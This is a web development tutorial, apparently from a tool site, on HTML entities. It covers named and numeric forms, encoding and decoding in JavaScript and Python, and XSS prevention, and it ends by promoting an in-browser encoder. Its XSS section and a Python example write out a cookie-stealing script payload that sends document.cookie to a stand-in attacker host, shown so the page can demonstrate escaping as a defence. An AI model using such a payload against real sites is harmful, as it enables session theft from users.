What Are HTML Entities?
HTML entities are special sequences of characters that represent symbols which cannot be typed directly into HTML markup or which have reserved meaning in the HTML specification. Every entity begins with an ampersand (&) and ends with a semicolon (;). Between these delimiters sits either a human-readable name or a numeric code that tells the browser which character to render.
For example, the less-than sign (<) is reserved in HTML because it opens an element tag. If you want to display a literal less-than sign on a page, you must write &lt; instead. The browser reads that entity and renders the visual character without interpreting it as the start of a tag. Without this mechanism, it would be impossible to show code snippets, mathematical expressions, or any content containing reserved characters on a webpage.
HTML entities also solve a practical problem with character encodings. Before UTF-8 became the dominant encoding on the web, many servers and browsers used ASCII or Latin-1, which could not represent characters like the euro sign, em dash, or characters from non-Latin scripts. Entities provided a reliable, encoding-independent way to include these characters. Even today, entities remain a best practice for certain characters because they are unambiguous regardless of the document encoding.
Why HTML Entity Encoding Matters
Preventing Cross-Site Scripting (XSS)
Cross-site scripting is one of the most common web security vulnerabilities and a long-standing entry in the OWASP Top 10 (since the 2021 edition, as part of the Injection category). An XSS attack occurs when an attacker injects malicious JavaScript into a page that other users will view. The simplest example is a comment field that accepts user input and renders it directly into HTML without encoding:
<!-- User submits this as a comment -->
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
<!-- Without encoding, the browser executes the script -->
<!-- With encoding, it becomes harmless visible text: -->
&lt;script&gt;document.location=&#39;https://evil.com/steal?c=&#39;+document.cookie&lt;/script&gt;
When user-supplied content is properly entity-encoded before being inserted into the page, the browser displays the angle brackets and quotes as literal text rather than interpreting them as HTML or JavaScript. This is the first and most important line of defense against XSS. Most server-side template engines and modern frontend frameworks encode output by default for exactly this reason.
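The same idea can be sketched in Python. This is a minimal illustration, not a complete defense: render_comment is a hypothetical helper that builds markup by string formatting, whereas a real application would normally rely on its template engine's auto-escaping.

```python
import html


def render_comment(comment: str) -> str:
    """Hypothetical helper: wrap a user comment in a paragraph, encoding it first."""
    # html.escape converts &, < and >, plus both quote characters by default
    return f'<p class="comment">{html.escape(comment)}</p>'


payload = "<script>document.location='https://evil.com/steal?c='+document.cookie</script>"
rendered = render_comment(payload)
print(rendered)
```

The printed markup contains &lt;script&gt; rather than a script element, so a browser would show the payload as text instead of running it.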
Displaying Reserved Characters
HTML reserves five characters for its own syntax: the less-than sign (<), greater-than sign (>), ampersand (&), double quote ("), and single quote / apostrophe ('). If you write these characters directly inside HTML content, the browser may misinterpret them. For instance, an ampersand followed by text and a semicolon could be mistaken for an entity reference, leading to garbled output.
Technical documentation, code tutorials, and math-heavy pages rely heavily on entity encoding. Imagine trying to explain an HTML tag in a blog post without encoding the angle brackets — the browser would try to render it as an actual element instead of displaying the code.
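The ampersand ambiguity is easy to reproduce. The sketch below uses Python's html.unescape as a stand-in for an HTML parser (browsers apply slightly different rules in some positions, such as attribute values); the query string is an invented example.

```python
import html

# html.unescape follows the HTML5 rules, including legacy names such as
# "copy" that are recognized even without a trailing semicolon.
raw = "?a=1&copy=2"
garbled = html.unescape(raw)
print(garbled)  # the "&copy" part has been read as the copyright sign

# Encoding the ampersand first removes the ambiguity.
encoded = html.escape(raw)
print(encoded)                        # ?a=1&amp;copy=2
print(html.unescape(encoded) == raw)  # True
```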
Ensuring Cross-Browser Consistency
While modern browsers handle UTF-8 well, there are edge cases where certain Unicode characters render differently across operating systems and browsers. Non-breaking spaces (&nbsp;), soft hyphens (&shy;), and zero-width joiners (&zwj;) can behave unexpectedly, and they are invisible in most editors. Using named entities for these characters makes your intent explicit in the source.
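One way to make such invisible characters explicit is to rewrite them as named entities before the text goes into a template. A minimal Python sketch, assuming a hypothetical make_invisibles_explicit helper and covering only these three characters:

```python
import html

# Map invisible code points to their named entities (all three names are
# defined in HTML5).
INVISIBLE_TO_ENTITY = {
    0x00A0: "&nbsp;",  # non-breaking space
    0x00AD: "&shy;",   # soft hyphen
    0x200D: "&zwj;",   # zero-width joiner
}


def make_invisibles_explicit(text: str) -> str:
    """Replace the invisible characters above with their named entities."""
    return text.translate(INVISIBLE_TO_ENTITY)


sample = "10\u00a0km, hyphen\u00adation"
visible = make_invisibles_explicit(sample)
print(visible)  # 10&nbsp;km, hyphen&shy;ation
```

Note that this helper does not encode ampersands or angle brackets; it is meant to run on text that is otherwise already safe for the page.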
Named Entities vs. Numeric Entities
HTML supports two formats for entities: named and numeric. Named entities use a mnemonic label that is easy to remember, while numeric entities use the Unicode code point of the character. Here is a comparison of the most commonly used entities:
Character             Named Entity   Decimal Entity   Hex Entity
───────────────────   ────────────   ──────────────   ──────────
&                     &amp;          &#38;            &#x26;
<                     &lt;           &#60;            &#x3C;
>                     &gt;           &#62;            &#x3E;
"                     &quot;         &#34;            &#x22;
'                     &apos;         &#39;            &#x27;
(non-breaking space)  &nbsp;         &#160;           &#xA0;
©                     &copy;         &#169;           &#xA9;
€                     &euro;         &#8364;          &#x20AC;
—                     &mdash;        &#8212;          &#x2014;
™                     &trade;        &#8482;          &#x2122;
Named entities are more readable in source code, which makes them the preferred choice when one exists for the character you need. However, not every Unicode character has a named entity. In those cases you must use the numeric form. The decimal form uses &# followed by the decimal code point, and the hexadecimal form uses &#x followed by the hex value; both end with a semicolon.
One important note: &apos; was not officially part of HTML 4 and may not work in older parsers. The numeric form &#39; is safer for maximum compatibility. In HTML5, &apos; is fully supported.
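The relationship between the three forms can be checked in a few lines of Python. The numeric_entities helper is a hypothetical name used only for this sketch; it derives both numeric forms from a character's code point.

```python
import html


def numeric_entities(ch: str) -> tuple[str, str]:
    """Return the decimal and hexadecimal entity for a single character."""
    code_point = ord(ch)
    return f"&#{code_point};", f"&#x{code_point:X};"


decimal, hexadecimal = numeric_entities("€")
print(decimal, hexadecimal)  # &#8364; &#x20AC;

# The named, decimal, and hexadecimal spellings decode to the same character.
print(html.unescape("&euro;") == html.unescape(decimal) == html.unescape(hexadecimal))  # True
```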
Encoding HTML Entities in JavaScript
JavaScript does not have a built-in function specifically for HTML entity encoding, but you can achieve it in several ways. The most common approach is a simple replacement function:
function encodeHtmlEntities(str) {
  return str
    .replace(/&/g, "&amp;") // must run first, see the note below
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
// Usage
const userInput = '<script>alert("xss")</script>';
const safe = encodeHtmlEntities(userInput);
console.log(safe);
// &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
Notice that the ampersand replacement must come first. If you replace angle brackets before ampersands, the ampersand in &lt; would itself be encoded, producing the double-encoded &amp;lt;.
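The ordering problem can be reproduced in isolation. The sketch below is in Python rather than JavaScript, and both function names are invented for the comparison; it encodes only &, <, and > to keep the effect easy to see.

```python
def encode_wrong_order(text: str) -> str:
    # Angle brackets first: the "&" introduced by this step is hit again below
    return text.replace("<", "&lt;").replace(">", "&gt;").replace("&", "&amp;")


def encode_right_order(text: str) -> str:
    # Ampersand first, so only ampersands from the original text are encoded
    return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


print(encode_wrong_order("a < b"))  # a &amp;lt; b
print(encode_right_order("a < b"))  # a &lt; b
```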
For decoding, you can leverage the browser DOM. Creating a temporary textarea element and setting its innerHTML will cause the browser to decode all entities:
function decodeHtmlEntities(str) {
  // A textarea's content is parsed as text: entities are decoded, tags are not turned into elements
  const textarea = document.createElement("textarea");
  textarea.innerHTML = str;
  return textarea.value;
}
const decoded = decodeHtmlEntities("&lt;div class=&quot;box&quot;&gt;");
console.log(decoded);
// <div class="box">
In Node.js, where there is no DOM, you would use a library like he (HTML entities) or entities:
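import he from "he";
// Encoding (useNamedReferences asks he for named entities; by default it emits hexadecimal references)
he.encode('<script>alert("xss")</script>', { useNamedReferences: true });
// "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;"
// Decoding
he.decode("&lt;p&gt;Hello &amp; welcome&lt;/p&gt;");
// "<p>Hello & welcome</p>"
Encoding HTML Entities in Python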
Python's standard library includes the html module which provides straightforward encoding and decoding:
import html
# Encoding
encoded = html.escape('<script>alert("xss")</script>')
print(encoded)
# &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
# html.escape() always encodes &, <, and >
# With quote=True (the default) it also encodes " and '; pass quote=False to leave quotes alone
encoded = html.escape("It's a <test>", quote=True)
print(encoded)
# It&#x27;s a &lt;test&gt;
# Decoding
decoded = html.unescape("&lt;div&gt;Hello &amp; welcome&lt;/div&gt;")
print(decoded)
# <div>Hello & welcome</div>
The html.escape() function handles the five critical characters by default. For more comprehensive encoding that converts all non-ASCII characters to numeric entities, you can use the encode method with the xmlcharrefreplace error handler:
text = "Price: €50 — 20% off™"
encoded = text.encode("ascii", "xmlcharrefreplace").decode("ascii")
print(encoded)
# Price: &#8364;50 &#8212; 20% off&#8482;
How to Use the PulpMiner HTML Entity Tool
The HTML Entity Encoder/Decoder handles conversion instantly in your browser:
- Paste your text or encoded HTML into the input area. The tool accepts raw HTML, entity-encoded strings, or any mix of both.
- Choose Encode or Decode — encoding converts special characters to their entity equivalents, while decoding converts entities back to their original characters.
- Copy the result with a single click. The output preserves whitespace and formatting exactly as you need it.
The tool supports all named HTML entities defined in the HTML5 specification, as well as decimal and hexadecimal numeric entities. It runs entirely in your browser, so your data never leaves your machine.
Best Practices for HTML Entity Encoding
- Always encode user-generated content before rendering it in HTML. This is the single most effective defense against XSS.
- Encode on output, not on input. Store the original text in your database and encode it at the point where it is inserted into the page. This preserves the original data and allows you to encode differently depending on the context (HTML body, attribute, JavaScript string, URL).
- Use your framework's built-in encoding. React escapes JSX expressions by default. Django auto-escapes template variables. Rails escapes template output by default, so use html_safe judiciously. Do not bypass these protections unless you have a very specific reason.
- Encode for the correct context. HTML body encoding is different from attribute encoding, which is different from JavaScript string encoding. A character that is safe in an HTML body might be dangerous inside an onclick attribute.
- Use named entities for readability when available. Write &amp; instead of &#38; in your templates. Your future self will thank you when reading the source.
- Test with edge cases. Include strings with nested entities, mixed encodings, and Unicode characters in your test suite. Ensure double-encoding does not occur (for example, &amp;amp;).
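To illustrate the "correct context" point from the list above, here is a rough Python sketch that encodes one value for four destinations using only the standard library. The sample value and variable names are invented, and the sketch is not a complete defense: nested contexts (for example, a JavaScript string inside an HTML attribute) need both layers applied in the right order.

```python
import html
import json
from urllib.parse import quote

value = 'Tom & "Jerry" </script>'

body = html.escape(value, quote=False)  # HTML body text: encodes &, <, >
attribute = html.escape(value)          # attribute value: quotes as well
url_part = quote(value, safe="")        # URL component: percent-encoding
# JSON string literal; "</" is additionally broken up so that it cannot
# close an enclosing <script> element.
js_string = json.dumps(value).replace("</", "<\\/")

for label, encoded in [("body", body), ("attribute", attribute),
                       ("url", url_part), ("js", js_string)]:
    print(f"{label:10} {encoded}")
```

Each destination ends up with a different string for the same input, which is why encoding at output time, once the context is known, is easier to get right than encoding at input time.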
HTML entity encoding is a fundamental web development skill that sits at the intersection of security, correctness, and accessibility. Whether you are building a blog, an API dashboard, or a content management system, understanding how entities work ensures your pages render correctly and your users stay safe.
Ready to encode or decode HTML entities? Try the HTML Entity Tool — free, instant, and completely client-side.
